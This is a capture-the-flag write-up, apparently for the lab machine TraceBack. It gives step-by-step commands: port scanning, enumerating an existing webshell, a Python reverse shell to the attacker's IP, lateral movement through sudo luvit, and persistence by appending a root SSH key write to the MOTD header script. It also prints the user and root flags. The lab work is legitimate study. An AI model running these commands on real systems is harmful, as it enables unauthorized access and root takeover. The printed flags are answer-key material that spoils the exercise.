Information Gathering
| IP Address | Opening Ports |
|---|---|
| 10.10.10.181 | TCP:22,80 |
$ ip='10.10.10.181'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 9625518e6c830748ce114b1fe56d8a28 (RSA)
| 256 54bd467114bdb242a1b6b02d94143b0d (ECDSA)
|_ 256 4dc3f852b885ec9c3e4d572c4a82fd86 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Webshell enum
http://10.10.10.181/
![[Meachines] [Easy] TraceBack Webshell枚举+luvit横向+MOTD权限提升插图](https://img.4awl.net/img/1a/70f58c07888d38eae9d3e5eea0c766.jpg "[Meachines] [Easy] TraceBack Webshell枚举+luvit横向+MOTD权限提升插图")
![[Meachines] [Easy] TraceBack Webshell枚举+luvit横向+MOTD权限提升插图1](https://img.4awl.net/img/7e/474237cbc37ae2a73893e7e09f559e.jpg "[Meachines] [Easy] TraceBack Webshell枚举+luvit横向+MOTD权限提升插图1")
https://github.com/TheBinitGhimire/Web-Shells/tree/master/PHP
$ feroxbuster -u 'http://10.10.10.181/' -w ./backdoor
![[Meachines] [Easy] TraceBack Webshell枚举+luvit横向+MOTD权限提升插图2](https://img.4awl.net/img/2e/fb931dd425ecade0762258d266a842.jpg "[Meachines] [Easy] TraceBack Webshell枚举+luvit横向+MOTD权限提升插图2")
![[Meachines] [Easy] TraceBack Webshell枚举+luvit横向+MOTD权限提升插图3](https://img.4awl.net/img/c1/ef3493ccc4c8d441275b0c7973be5f.jpg "[Meachines] [Easy] TraceBack Webshell枚举+luvit横向+MOTD权限提升插图3")
admin:admin
![[Meachines] [Easy] TraceBack Webshell枚举+luvit横向+MOTD权限提升插图4](https://img.4awl.net/img/c8/056b998372b45189387e6174aab54b.jpg "[Meachines] [Easy] TraceBack Webshell枚举+luvit横向+MOTD权限提升插图4")
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.33",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
![[Meachines] [Easy] TraceBack Webshell枚举+luvit横向+MOTD权限提升插图5](https://img.4awl.net/img/fa/a1c770e69db725c8ca4671796d8e85.jpg "[Meachines] [Easy] TraceBack Webshell枚举+luvit横向+MOTD权限提升插图5")
Lateral Movement:luvit
webadmin@traceback:~$ sudo -l
![[Meachines] [Easy] TraceBack Webshell枚举+luvit横向+MOTD权限提升插图6](https://img.4awl.net/img/da/c3c07fe3e649d83ce8937c61d8a1d8.jpg "[Meachines] [Easy] TraceBack Webshell枚举+luvit横向+MOTD权限提升插图6")
![[Meachines] [Easy] TraceBack Webshell枚举+luvit横向+MOTD权限提升插图7](https://img.4awl.net/img/64/8661450681fa2bbfd56830c7bf037a.jpg "[Meachines] [Easy] TraceBack Webshell枚举+luvit横向+MOTD权限提升插图7")
webadmin@traceback:~$ sudo -u sysadmin /home/sysadmin/luvit -e "os.execute('/bin/bash')"
![[Meachines] [Easy] TraceBack Webshell枚举+luvit横向+MOTD权限提升插图8](https://img.4awl.net/img/b6/76b374ee0ebf9bdfec0ef5fd3793c3.jpg "[Meachines] [Easy] TraceBack Webshell枚举+luvit横向+MOTD权限提升插图8")
User.txt
7ce54557e73840b9267ec0250771ca40
Privilege Escalation:MOTD
![[Meachines] [Easy] TraceBack Webshell枚举+luvit横向+MOTD权限提升插图9](https://img.4awl.net/img/64/3478bdde69eebe003d8cb0615e6c41.jpg "[Meachines] [Easy] TraceBack Webshell枚举+luvit横向+MOTD权限提升插图9")
![[Meachines] [Easy] TraceBack Webshell枚举+luvit横向+MOTD权限提升插图10](https://img.4awl.net/img/c7/4341b80047d3e1b9a128811a738b08.jpg "[Meachines] [Easy] TraceBack Webshell枚举+luvit横向+MOTD权限提升插图10")
注意:30秒脚本会复制执行一次,所以必须30s后在执行以下语句,将有效载荷追加到00head。否则载荷将被清除覆盖...再进一步通过ssh登录触发00-header
$ echo "echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHW/AdC4GrFM0XNoi5DrRrmUCSfp5EE439+ay1c2JIQq maptnh@maptnh-H4CK13'>/root/.ssh/authorized_keys" >> /etc/update-motd.d/00-header
$ ssh sysadmin@10.10.10.181
$ ssh root@10.10.10.181
![[Meachines] [Easy] TraceBack Webshell枚举+luvit横向+MOTD权限提升插图11](https://img.4awl.net/img/78/6dac7017209baf69a2064dad17af8b.jpg "[Meachines] [Easy] TraceBack Webshell枚举+luvit横向+MOTD权限提升插图11")
Root.txt
3a906703b8fdbe8036a91e9ff9b3edcc
4A评测 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。
侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)
